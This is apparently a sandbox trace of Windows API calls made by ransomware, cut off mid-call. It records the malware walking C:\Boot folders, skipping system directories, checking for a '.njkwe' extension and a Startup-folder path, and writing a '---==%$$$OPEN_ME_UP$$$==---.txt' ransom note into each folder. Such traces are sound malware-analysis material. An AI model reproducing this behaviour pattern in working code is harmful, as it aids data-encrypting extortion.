ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc487a0b9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x209bac02, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12560, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0065.030] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0065.030] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$Recycle.bin") returned 1 [0065.030] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="System Volume Information") returned -1 [0065.030] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files") returned -1 [0065.030] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files (x86)") returned -1 [0065.030] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\et-EE\\bootmgr.exe.mui") returned 33 [0065.030] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".njkwe") returned 0x0 [0065.030] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0065.030] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="taridd") returned -1 [0065.030] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\et-EE\\bootmgr.exe.mui", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0065.030] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\et-EE\\bootmgr.exe.mui" (normalized: "c:\\boot\\et-ee\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0065.031] FindNextFileW (in: hFindFile=0xc1a360, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc487a0b9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x209bac02, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12560, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0065.031] FindClose (in: hFindFile=0xc1a360 | out: hFindFile=0xc1a360) returned 1 [0065.031] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\et-EE\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 49 [0065.031] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\et-EE\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\boot\\et-ee\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0065.031] WriteFile (in: hFile=0x428, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f7ec, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f7ec*=0x351, lpOverlapped=0x0) returned 1 [0065.032] CloseHandle (hObject=0x428) returned 1 [0065.032] GetProcessHeap () returned 0xbe0000 [0065.033] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0065.033] FindNextFileW (in: hFindFile=0xc19c60, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa000cf3a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef59a5b1, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="fi-FI", cAlternateFileName="")) returned 1 [0065.033] lstrcmpiW (lpString1="fi-FI", lpString2="Windows") returned -1 [0065.033] lstrcmpiW (lpString1="fi-FI", lpString2="$Recycle.bin") returned 1 [0065.033] lstrcmpiW (lpString1="fi-FI", lpString2="System Volume Information") returned -1 [0065.033] lstrcmpiW (lpString1="fi-FI", lpString2="Program Files") returned -1 [0065.033] lstrcmpiW (lpString1="fi-FI", lpString2="Program Files (x86)") returned -1 [0065.033] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\fi-FI") returned 17 [0065.033] lstrcmpW (lpString1="fi-FI", lpString2=".") returned 1 [0065.033] lstrcmpW (lpString1="fi-FI", lpString2="..") returned 1 [0065.033] lstrcmpW (lpString1="\\\\?\\C:\\Boot\\fi-FI", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0065.033] GetProcessHeap () returned 0xbe0000 [0065.033] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0065.033] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\fi-FI\\*") returned 19 [0065.033] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\fi-FI\\*", lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa000cf3a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef59a5b1, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc1a360 [0065.033] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0065.033] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0065.033] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0065.033] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0065.033] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0065.033] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\fi-FI\\.") returned 19 [0065.033] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0065.033] FindNextFileW (in: hFindFile=0xc1a360, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa000cf3a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef59a5b1, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0065.033] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0065.033] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0065.033] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0065.033] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0065.034] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0065.034] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\fi-FI\\..") returned 20 [0065.034] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0065.034] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0065.034] FindNextFileW (in: hFindFile=0xc1a360, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc487a0b9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2096e751, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12b60, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0065.034] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0065.034] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$Recycle.bin") returned 1 [0065.034] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="System Volume Information") returned -1 [0065.034] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files") returned -1 [0065.034] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files (x86)") returned -1 [0065.034] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\fi-FI\\bootmgr.exe.mui") returned 33 [0065.034] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".njkwe") returned 0x0 [0065.034] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0065.034] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="taridd") returned -1 [0065.034] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\fi-FI\\bootmgr.exe.mui", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0065.034] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\fi-FI\\bootmgr.exe.mui" (normalized: "c:\\boot\\fi-fi\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0065.034] FindNextFileW (in: hFindFile=0xc1a360, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef59a5b1, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf3a246aa, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb1a0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0065.034] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="Windows") returned -1 [0065.034] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="$Recycle.bin") returned 1 [0065.034] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="System Volume Information") returned -1 [0065.034] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="Program Files") returned -1 [0065.034] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="Program Files (x86)") returned -1 [0065.034] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\fi-FI\\memtest.exe.mui") returned 33 [0065.034] StrStrIW (lpFirst="memtest.exe.mui", lpSrch=".njkwe") returned 0x0 [0065.034] lstrcmpW (lpString1="memtest.exe.mui", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0065.034] lstrcmpW (lpString1="memtest.exe.mui", lpString2="taridd") returned -1 [0065.034] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\fi-FI\\memtest.exe.mui", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0065.034] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\fi-FI\\memtest.exe.mui" (normalized: "c:\\boot\\fi-fi\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0065.034] FindNextFileW (in: hFindFile=0xc1a360, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef59a5b1, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf3a246aa, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb1a0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0065.035] FindClose (in: hFindFile=0xc1a360 | out: hFindFile=0xc1a360) returned 1 [0065.035] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\fi-FI\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 49 [0065.035] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\fi-FI\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\boot\\fi-fi\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0065.037] WriteFile (in: hFile=0x428, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f7ec, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f7ec*=0x351, lpOverlapped=0x0) returned 1 [0065.038] CloseHandle (hObject=0x428) returned 1 [0065.038] GetProcessHeap () returned 0xbe0000 [0065.038] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0065.038] FindNextFileW (in: hFindFile=0xc19c60, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc49ab3c7, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0109451, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef999ae4, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Fonts", cAlternateFileName="")) returned 1 [0065.038] lstrcmpiW (lpString1="Fonts", lpString2="Windows") returned -1 [0065.038] lstrcmpiW (lpString1="Fonts", lpString2="$Recycle.bin") returned 1 [0065.038] lstrcmpiW (lpString1="Fonts", lpString2="System Volume Information") returned -1 [0065.038] lstrcmpiW (lpString1="Fonts", lpString2="Program Files") returned -1 [0065.038] lstrcmpiW (lpString1="Fonts", lpString2="Program Files (x86)") returned -1 [0065.038] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Fonts") returned 17 [0065.038] lstrcmpW (lpString1="Fonts", lpString2=".") returned 1 [0065.038] lstrcmpW (lpString1="Fonts", lpString2="..") returned 1 [0065.038] lstrcmpW (lpString1="\\\\?\\C:\\Boot\\Fonts", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0065.038] GetProcessHeap () returned 0xbe0000 [0065.038] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0065.038] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\*") returned 19 [0065.038] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\Fonts\\*", lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc49ab3c7, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0109451, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef999ae4, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc1a120 [0065.043] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0065.043] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0065.043] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0065.043] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0065.043] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0065.043] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\.") returned 19 [0065.043] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0065.043] FindNextFileW (in: hFindFile=0xc1a120, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc49ab3c7, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0109451, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef999ae4, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0065.044] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0065.044] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0065.044] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0065.044] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0065.044] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0065.044] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\..") returned 20 [0065.044] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0065.044] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0065.044] FindNextFileW (in: hFindFile=0xc1a120, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc49ab3c7, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef782dd9, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2488a26, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x386467, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="chs_boot.ttf", cAlternateFileName="")) returned 1 [0065.044] lstrcmpiW (lpString1="chs_boot.ttf", lpString2="Windows") returned -1 [0065.044] lstrcmpiW (lpString1="chs_boot.ttf", lpString2="$Recycle.bin") returned 1 [0065.044] lstrcmpiW (lpString1="chs_boot.ttf", lpString2="System Volume Information") returned -1 [0065.044] lstrcmpiW (lpString1="chs_boot.ttf", lpString2="Program Files") returned -1 [0065.044] lstrcmpiW (lpString1="chs_boot.ttf", lpString2="Program Files (x86)") returned -1 [0065.044] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\chs_boot.ttf") returned 30 [0065.044] StrStrIW (lpFirst="chs_boot.ttf", lpSrch=".njkwe") returned 0x0 [0065.044] lstrcmpW (lpString1="chs_boot.ttf", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0065.044] lstrcmpW (lpString1="chs_boot.ttf", lpString2="taridd") returned -1 [0065.044] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\Fonts\\chs_boot.ttf", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0065.044] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\chs_boot.ttf" (normalized: "c:\\boot\\fonts\\chs_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0065.045] FindNextFileW (in: hFindFile=0xc1a120, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4a1dbea, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef81cc08, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2488a26, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x3b2e0a, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="cht_boot.ttf", cAlternateFileName="")) returned 1 [0065.045] lstrcmpiW (lpString1="cht_boot.ttf", lpString2="Windows") returned -1 [0065.045] lstrcmpiW (lpString1="cht_boot.ttf", lpString2="$Recycle.bin") returned 1 [0065.045] lstrcmpiW (lpString1="cht_boot.ttf", lpString2="System Volume Information") returned -1 [0065.045] lstrcmpiW (lpString1="cht_boot.ttf", lpString2="Program Files") returned -1 [0065.045] lstrcmpiW (lpString1="cht_boot.ttf", lpString2="Program Files (x86)") returned -1 [0065.045] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\cht_boot.ttf") returned 30 [0065.045] StrStrIW (lpFirst="cht_boot.ttf", lpSrch=".njkwe") returned 0x0 [0065.045] lstrcmpW (lpString1="cht_boot.ttf", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0065.045] lstrcmpW (lpString1="cht_boot.ttf", lpString2="taridd") returned -1 [0065.046] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\Fonts\\cht_boot.ttf", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0065.046] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\cht_boot.ttf" (normalized: "c:\\boot\\fonts\\cht_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0065.047] FindNextFileW (in: hFindFile=0xc1a120, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4a902c2, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef8771a7, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2488a26, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x1e4d4b, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="jpn_boot.ttf", cAlternateFileName="")) returned 1 [0065.047] lstrcmpiW (lpString1="jpn_boot.ttf", lpString2="Windows") returned -1 [0065.047] lstrcmpiW (lpString1="jpn_boot.ttf", lpString2="$Recycle.bin") returned 1 [0065.047] lstrcmpiW (lpString1="jpn_boot.ttf", lpString2="System Volume Information") returned -1 [0065.047] lstrcmpiW (lpString1="jpn_boot.ttf", lpString2="Program Files") returned -1 [0065.047] lstrcmpiW (lpString1="jpn_boot.ttf", lpString2="Program Files (x86)") returned -1 [0065.047] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\jpn_boot.ttf") returned 30 [0065.047] StrStrIW (lpFirst="jpn_boot.ttf", lpSrch=".njkwe") returned 0x0 [0065.047] lstrcmpW (lpString1="jpn_boot.ttf", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0065.047] lstrcmpW (lpString1="jpn_boot.ttf", lpString2="taridd") returned -1 [0065.047] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\Fonts\\jpn_boot.ttf", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0065.047] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\jpn_boot.ttf" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0065.049] FindNextFileW (in: hFindFile=0xc1a120, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4b4eed5, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef8c4060, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf24aec9d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x243588, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="kor_boot.ttf", cAlternateFileName="")) returned 1 [0065.049] lstrcmpiW (lpString1="kor_boot.ttf", lpString2="Windows") returned -1 [0065.049] lstrcmpiW (lpString1="kor_boot.ttf", lpString2="$Recycle.bin") returned 1 [0065.049] lstrcmpiW (lpString1="kor_boot.ttf", lpString2="System Volume Information") returned -1 [0065.049] lstrcmpiW (lpString1="kor_boot.ttf", lpString2="Program Files") returned -1 [0065.049] lstrcmpiW (lpString1="kor_boot.ttf", lpString2="Program Files (x86)") returned -1 [0065.049] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\kor_boot.ttf") returned 30 [0065.049] StrStrIW (lpFirst="kor_boot.ttf", lpSrch=".njkwe") returned 0x0 [0065.049] lstrcmpW (lpString1="kor_boot.ttf", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0065.049] lstrcmpW (lpString1="kor_boot.ttf", lpString2="taridd") returned -1 [0065.049] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\Fonts\\kor_boot.ttf", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0065.049] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\kor_boot.ttf" (normalized: "c:\\boot\\fonts\\kor_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0065.050] FindNextFileW (in: hFindFile=0xc1a120, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4b9b37e, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef8e28b4, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf24aec9d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x2ab6f, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="malgunn_boot.ttf", cAlternateFileName="MALGUN~1.TTF")) returned 1 [0065.050] lstrcmpiW (lpString1="malgunn_boot.ttf", lpString2="Windows") returned -1 [0065.050] lstrcmpiW (lpString1="malgunn_boot.ttf", lpString2="$Recycle.bin") returned 1 [0065.050] lstrcmpiW (lpString1="malgunn_boot.ttf", lpString2="System Volume Information") returned -1 [0065.050] lstrcmpiW (lpString1="malgunn_boot.ttf", lpString2="Program Files") returned -1 [0065.050] lstrcmpiW (lpString1="malgunn_boot.ttf", lpString2="Program Files (x86)") returned -1 [0065.050] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\malgunn_boot.ttf") returned 34 [0065.050] StrStrIW (lpFirst="malgunn_boot.ttf", lpSrch=".njkwe") returned 0x0 [0065.051] lstrcmpW 